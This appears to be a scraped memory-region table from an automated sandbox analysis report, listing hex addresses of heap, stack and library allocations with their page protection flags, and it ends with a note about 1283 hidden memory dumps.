||
6C22000
|
heap
|
page read and write
|
||
7C10000
|
heap
|
page read and write
|
||
6F00000
|
trusted library allocation
|
page read and write
|
||
610000
|
trusted library section
|
page read and write
|
||
5E84000
|
trusted library allocation
|
page read and write
|
||
4BA3000
|
trusted library allocation
|
page read and write
|
||
4A82000
|
trusted library allocation
|
page read and write
|
||
8B90000
|
trusted library section
|
page read and write
|
||
E9198FF000
|
stack
|
page read and write
|
||
4F49000
|
trusted library allocation
|
page read and write
|
||
4D10000
|
trusted library allocation
|
page read and write
|
||
8300000
|
trusted library allocation
|
page read and write
|
||
4B2B000
|
trusted library allocation
|
page read and write
|
||
7130000
|
trusted library allocation
|
page read and write
|
||
88E0000
|
trusted library section
|
page read and write
|
||
4DAE000
|
trusted library allocation
|
page read and write
|
||
4DB5000
|
trusted library allocation
|
page read and write
|
||
4C8D000
|
trusted library allocation
|
page read and write
|
||
4C57000
|
trusted library allocation
|
page read and write
|
||
4570000
|
trusted library allocation
|
page read and write
|
||
66CE000
|
stack
|
page read and write
|
||
6220000
|
trusted library allocation
|
page read and write
|
||
4B19000
|
trusted library allocation
|
page read and write
|
||
4CAA000
|
trusted library allocation
|
page read and write
|
||
22526C10000
|
heap
|
page read and write
|
||
685D000
|
stack
|
page read and write
|
||
B75000
|
heap
|
page read and write
|
||
2C4C000
|
trusted library allocation
|
page read and write
|
||
4DC5000
|
trusted library allocation
|
page read and write
|
||
2560000
|
trusted library allocation
|
page execute and read and write
|
||
4B08000
|
trusted library allocation
|
page read and write
|
||
7B26000
|
stack
|
page read and write
|
||
6F39000
|
trusted library allocation
|
page read and write
|
||
C1A000
|
trusted library allocation
|
page read and write
|
||
7A7000
|
heap
|
page read and write
|
||
49F5000
|
trusted library allocation
|
page read and write
|
||
4AFB000
|
trusted library allocation
|
page read and write
|
||
15D1000
|
trusted library allocation
|
page read and write
|
||
A7F000
|
stack
|
page read and write
|
||
4AAE000
|
trusted library allocation
|
page read and write
|
||
4CF2000
|
trusted library allocation
|
page read and write
|
||
4F24000
|
trusted library allocation
|
page read and write
|
||
8310000
|
trusted library allocation
|
page read and write
|
||
4ECC000
|
trusted library allocation
|
page read and write
|
||
4D00000
|
trusted library allocation
|
page read and write
|
||
627D000
|
stack
|
page read and write
|
||
A30000
|
unkown
|
page readonly
|
||
4D17000
|
trusted library allocation
|
page read and write
|
||
5070000
|
heap
|
page execute and read and write
|
||
526E000
|
stack
|
page read and write
|
||
136E000
|
stack
|
page read and write
|
||
4F47000
|
trusted library allocation
|
page read and write
|
||
4F0A000
|
trusted library allocation
|
page read and write
|
||
B81000
|
heap
|
page read and write
|
||
4C00000
|
trusted library allocation
|
page read and write
|
||
4E29000
|
trusted library allocation
|
page read and write
|
||
4DED000
|
trusted library allocation
|
page read and write
|
||
69E000
|
stack
|
page read and write
|
||
527C000
|
stack
|
page read and write
|
||
4CED000
|
trusted library allocation
|
page read and write
|
||
24D0000
|
trusted library allocation
|
page read and write
|
||
45C000
|
stack
|
page read and write
|
||
4CC0000
|
trusted library allocation
|
page read and write
|
||
6DD0000
|
heap
|
page read and write
|
||
AA0000
|
heap
|
page read and write
|
||
4B84000
|
trusted library allocation
|
page read and write
|
||
66DE000
|
stack
|
page read and write
|
||
8190000
|
trusted library allocation
|
page execute and read and write
|
||
65E000
|
stack
|
page read and write
|
||
4B59000
|
trusted library allocation
|
page read and write
|
||
B70000
|
heap
|
page readonly
|
||
4CE6000
|
trusted library allocation
|
page read and write
|
||
60BE000
|
stack
|
page read and write
|
||
7100000
|
trusted library allocation
|
page read and write
|
||
6E03000
|
heap
|
page read and write
|
||
4DF5000
|
trusted library allocation
|
page read and write
|
||
79D000
|
heap
|
page read and write
|
||
D55000
|
trusted library allocation
|
page execute and read and write
|
||
8AA0000
|
trusted library allocation
|
page execute and read and write
|
||
4BA6000
|
trusted library allocation
|
page read and write
|
||
4CBF000
|
trusted library allocation
|
page read and write
|
||
49D000
|
stack
|
page read and write
|
||
7FFB1E875000
|
unkown
|
page readonly
|
||
A50000
|
heap
|
page read and write
|
||
4F08000
|
trusted library allocation
|
page read and write
|
||
2CD8000
|
trusted library allocation
|
page read and write
|
||
4B89000
|
trusted library allocation
|
page read and write
|
||
229C7582000
|
heap
|
page read and write
|
||
4D53000
|
trusted library allocation
|
page read and write
|
||
611F000
|
stack
|
page read and write
|
||
4D0D000
|
trusted library allocation
|
page read and write
|
||
8B90000
|
trusted library allocation
|
page execute and read and write
|
||
6920000
|
heap
|
page read and write
|
||
15BE000
|
trusted library allocation
|
page read and write
|
||
5E9000
|
heap
|
page read and write
|
||
4A31000
|
trusted library allocation
|
page read and write
|
||
49FB000
|
trusted library allocation
|
page read and write
|
||
4BB2000
|
trusted library allocation
|
page read and write
|
||
57F6000
|
trusted library allocation
|
page read and write
|
||
6A1B000
|
stack
|
page read and write
|
||
C30000
|
trusted library allocation
|
page execute and read and write
|
||
6C5E000
|
stack
|
page read and write
|
||
4CAC000
|
trusted library allocation
|
page read and write
|
||
6F20000
|
trusted library allocation
|
page read and write
|
||
455E000
|
stack
|
page read and write
|
||
4630000
|
trusted library allocation
|
page read and write
|
||
22526B10000
|
heap
|
page read and write
|
||
4B27000
|
trusted library allocation
|
page read and write
|
||
4EB9000
|
trusted library allocation
|
page read and write
|
||
3CA7000
|
trusted library allocation
|
page read and write
|
||
4B44000
|
trusted library allocation
|
page read and write
|
||
807C000
|
trusted library allocation
|
page read and write
|
||
4AE7000
|
trusted library allocation
|
page read and write
|
||
4C7A000
|
trusted library allocation
|
page read and write
|
||
5CEC000
|
heap
|
page read and write
|
||
7150000
|
trusted library allocation
|
page read and write
|
||
6E60000
|
trusted library allocation
|
page read and write
|
||
4AD9000
|
trusted library allocation
|
page read and write
|
||
4BF3000
|
trusted library allocation
|
page read and write
|
||
4A63000
|
trusted library allocation
|
page read and write
|
||
7C90000
|
trusted library allocation
|
page read and write
|
||
5848000
|
trusted library allocation
|
page read and write
|
||
607F000
|
stack
|
page read and write
|
||
6E69000
|
trusted library allocation
|
page read and write
|
||
B80000
|
heap
|
page read and write
|
||
4F68000
|
trusted library allocation
|
page read and write
|
||
6E4D000
|
heap
|
page read and write
|
||
8060000
|
trusted library allocation
|
page read and write
|
||
7FBF0000
|
trusted library allocation
|
page execute and read and write
|
||
7B82000
|
trusted library allocation
|
page read and write
|
||
AAA000
|
heap
|
page read and write
|
||
BCE000
|
stack
|
page read and write
|
||
C20000
|
heap
|
page read and write
|
||
5080000
|
heap
|
page read and write
|
||
7C75000
|
trusted library allocation
|
page read and write
|
||
4E87000
|
trusted library allocation
|
page read and write
|
||
6E5F000
|
heap
|
page read and write
|
||
410000
|
heap
|
page read and write
|
||
7A60000
|
trusted library allocation
|
page execute and read and write
|
||
4074000
|
trusted library allocation
|
page read and write
|
||
4AA7000
|
trusted library allocation
|
page read and write
|
||
4AF0000
|
trusted library allocation
|
page read and write
|
||
4E6E000
|
trusted library allocation
|
page read and write
|
||
4FA0000
|
trusted library allocation
|
page read and write
|
||
4B7E000
|
trusted library allocation
|
page read and write
|
||
8240000
|
trusted library allocation
|
page read and write
|
||
5D5E000
|
stack
|
page read and write
|
||
4100000
|
heap
|
page read and write
|
||
643E000
|
stack
|
page read and write
|
||
4CFC000
|
trusted library allocation
|
page read and write
|
||
4EFC000
|
trusted library allocation
|
page read and write
|
||
4DAC000
|
trusted library allocation
|
page read and write
|
||
7DE0000
|
heap
|
page read and write
|
||
4D47000
|
trusted library allocation
|
page read and write
|
||
633E000
|
stack
|
page read and write
|
||
B223AFE000
|
stack
|
page read and write
|
||
7FB60000
|
trusted library allocation
|
page execute and read and write
|
||
2701000
|
trusted library allocation
|
page read and write
|
||
4C14000
|
trusted library allocation
|
page read and write
|
||
522E000
|
stack
|
page read and write
|
||
4B8D000
|
trusted library allocation
|
page read and write
|
||
A31000
|
unkown
|
page execute read
|
||
C60000
|
heap
|
page read and write
|
||
2691000
|
trusted library allocation
|
page read and write
|
||
88F267F000
|
stack
|
page read and write
|
||
4D1F000
|
trusted library allocation
|
page read and write
|
||
4BA0000
|
trusted library allocation
|
page read and write
|
||
4A12000
|
trusted library allocation
|
page read and write
|
||
6D0000
|
heap
|
page read and write
|
||
6D10000
|
heap
|
page read and write
|
||
6E41000
|
heap
|
page read and write
|
||
4FAA000
|
trusted library allocation
|
page read and write
|
||
4D0A000
|
trusted library allocation
|
page read and write
|
||
46A1000
|
trusted library allocation
|
page read and write
|
||
4AB6000
|
trusted library allocation
|
page read and write
|
||
15F0000
|
trusted library allocation
|
page read and write
|
||
4DE2000
|
trusted library allocation
|
page read and write
|
||
4D3E000
|
trusted library allocation
|
page read and write
|
||
25E8069C000
|
heap
|
page read and write
|
||
5CEE000
|
heap
|
page read and write
|
||
ADB4AFB000
|
stack
|
page read and write
|
||
4D0E000
|
trusted library allocation
|
page read and write
|
||
229C7770000
|
heap
|
page read and write
|
||
4ABE000
|
trusted library allocation
|
page read and write
|
||
8180000
|
trusted library allocation
|
page execute and read and write
|
||
8090000
|
trusted library allocation
|
page read and write
|
||
4EBC000
|
trusted library allocation
|
page read and write
|
||
24E5000
|
trusted library allocation
|
page execute and read and write
|
||
4BC3000
|
trusted library allocation
|
page read and write
|
||
4DA8000
|
trusted library allocation
|
page read and write
|
||
820000
|
heap
|
page read and write
|
||
566E000
|
trusted library allocation
|
page read and write
|
||
AD5000
|
heap
|
page read and write
|
||
4B31000
|
trusted library allocation
|
page read and write
|
||
2089CB90000
|
heap
|
page read and write
|
||
C00000
|
trusted library allocation
|
page read and write
|
||
4DE7000
|
heap
|
page read and write
|
||
4D49000
|
trusted library allocation
|
page read and write
|
||
4C90000
|
trusted library allocation
|
page read and write
|
||
4AD5000
|
trusted library allocation
|
page read and write
|
||
8030000
|
trusted library allocation
|
page read and write
|
||
B8C000
|
heap
|
page read and write
|
||
4ED8000
|
trusted library allocation
|
page read and write
|
||
C37000
|
heap
|
page read and write
|
||
4ECC000
|
trusted library allocation
|
page read and write
|
||
6F02000
|
trusted library allocation
|
page read and write
|
||
25E80670000
|
heap
|
page read and write
|
||
4F4D000
|
trusted library allocation
|
page read and write
|
||
4D40000
|
trusted library allocation
|
page read and write
|
||
4BC7000
|
trusted library allocation
|
page read and write
|
||
7070000
|
trusted library allocation
|
page read and write
|
||
5E70000
|
trusted library allocation
|
page read and write
|
||
4EAE000
|
trusted library allocation
|
page read and write
|
||
7FFE000
|
stack
|
page read and write
|
||
6FBA6000
|
unkown
|
page readonly
|
||
7B80000
|
trusted library allocation
|
page read and write
|
||
4D02000
|
trusted library allocation
|
page read and write
|
||
15B0000
|
trusted library allocation
|
page read and write
|
||
A10000
|
heap
|
page read and write
|
||
4DBB000
|
trusted library allocation
|
page read and write
|
||
6B8E000
|
stack
|
page read and write
|
||
7B2E000
|
stack
|
page read and write
|
||
4EF1000
|
trusted library allocation
|
page read and write
|
||
4B78000
|
trusted library allocation
|
page read and write
|
||
464E000
|
stack
|
page read and write
|
||
4AE0000
|
trusted library allocation
|
page read and write
|
||
CB2000
|
unkown
|
page readonly
|
||
704E000
|
stack
|
page read and write
|
||
6F0E000
|
stack
|
page read and write
|
||
4CF2000
|
trusted library allocation
|
page read and write
|
||
6A0000
|
heap
|
page read and write
|
||
4BC9000
|
trusted library allocation
|
page read and write
|
||
4CA2000
|
trusted library allocation
|
page read and write
|
||
70F0000
|
trusted library allocation
|
page read and write
|
||
1440000
|
heap
|
page read and write
|
||
4A2F000
|
trusted library allocation
|
page read and write
|
||
15CE000
|
trusted library allocation
|
page read and write
|
||
8A80000
|
trusted library allocation
|
page execute and read and write
|
||
4F9A000
|
trusted library allocation
|
page read and write
|
||
82F0000
|
trusted library allocation
|
page read and write
|
||
BC1000
|
heap
|
page read and write
|
||
6850000
|
heap
|
page execute and read and write
|
||
C40000
|
trusted library allocation
|
page read and write
|
||
6360000
|
trusted library allocation
|
page read and write
|
||
ADB42FE000
|
stack
|
page read and write
|
||
6FD0000
|
trusted library allocation
|
page read and write
|
||
4DB0000
|
trusted library allocation
|
page read and write
|
||
4D47000
|
trusted library allocation
|
page read and write
|
||
CB1000
|
unkown
|
page write copy
|
||
4F3C000
|
trusted library allocation
|
page read and write
|
||
4B0C000
|
trusted library allocation
|
page read and write
|
||
56A1000
|
trusted library allocation
|
page read and write
|
||
24DA000
|
trusted library allocation
|
page execute and read and write
|
||
4AF9000
|
trusted library allocation
|
page read and write
|
||
54BD000
|
stack
|
page read and write
|
||
B28000
|
heap
|
page read and write
|
||
D46000
|
trusted library allocation
|
page execute and read and write
|
||
7EF0000
|
trusted library allocation
|
page execute and read and write
|
||
3C41000
|
trusted library allocation
|
page read and write
|
||
24D6000
|
trusted library allocation
|
page execute and read and write
|
||
B2D000
|
trusted library allocation
|
page execute and read and write
|
||
497000
|
stack
|
page read and write
|
||
A41000
|
unkown
|
page read and write
|
||
67FE000
|
stack
|
page read and write
|
||
4A62000
|
trusted library allocation
|
page read and write
|
||
4D55000
|
trusted library allocation
|
page read and write
|
||
7FBE000
|
stack
|
page read and write
|
||
4640000
|
heap
|
page execute and read and write
|
||
80B0000
|
trusted library allocation
|
page read and write
|
||
7BEA000
|
trusted library allocation
|
page read and write
|
||
6A5E000
|
stack
|
page read and write
|
||
ADB44FE000
|
stack
|
page read and write
|
||
80A0000
|
trusted library allocation
|
page read and write
|
||
4EC1000
|
trusted library allocation
|
page read and write
|
||
4D59000
|
trusted library allocation
|
page read and write
|
||
407D000
|
trusted library allocation
|
page execute and read and write
|
||
B44000
|
heap
|
page read and write
|
||
4C98000
|
trusted library allocation
|
page read and write
|
||
40E8000
|
trusted library allocation
|
page read and write
|
||
5E9D000
|
trusted library allocation
|
page read and write
|
||
4190000
|
trusted library allocation
|
page execute and read and write
|
||
4D79000
|
trusted library allocation
|
page read and write
|
||
4FA2000
|
trusted library allocation
|
page read and write
|
||
A94000
|
unkown
|
page readonly
|
||
4D3C000
|
trusted library allocation
|
page read and write
|
||
6E10000
|
trusted library allocation
|
page read and write
|
||
4AB0000
|
trusted library allocation
|
page read and write
|
||
3C69000
|
trusted library allocation
|
page read and write
|
||
4D4F000
|
trusted library allocation
|
page read and write
|
||
40C0000
|
trusted library allocation
|
page read and write
|
||
5FE0000
|
trusted library allocation
|
page read and write
|
||
4A55000
|
trusted library allocation
|
page read and write
|
||
4F06000
|
trusted library allocation
|
page read and write
|
||
4F17000
|
trusted library allocation
|
page read and write
|
There are 1283 hidden memdumps, click here to show them.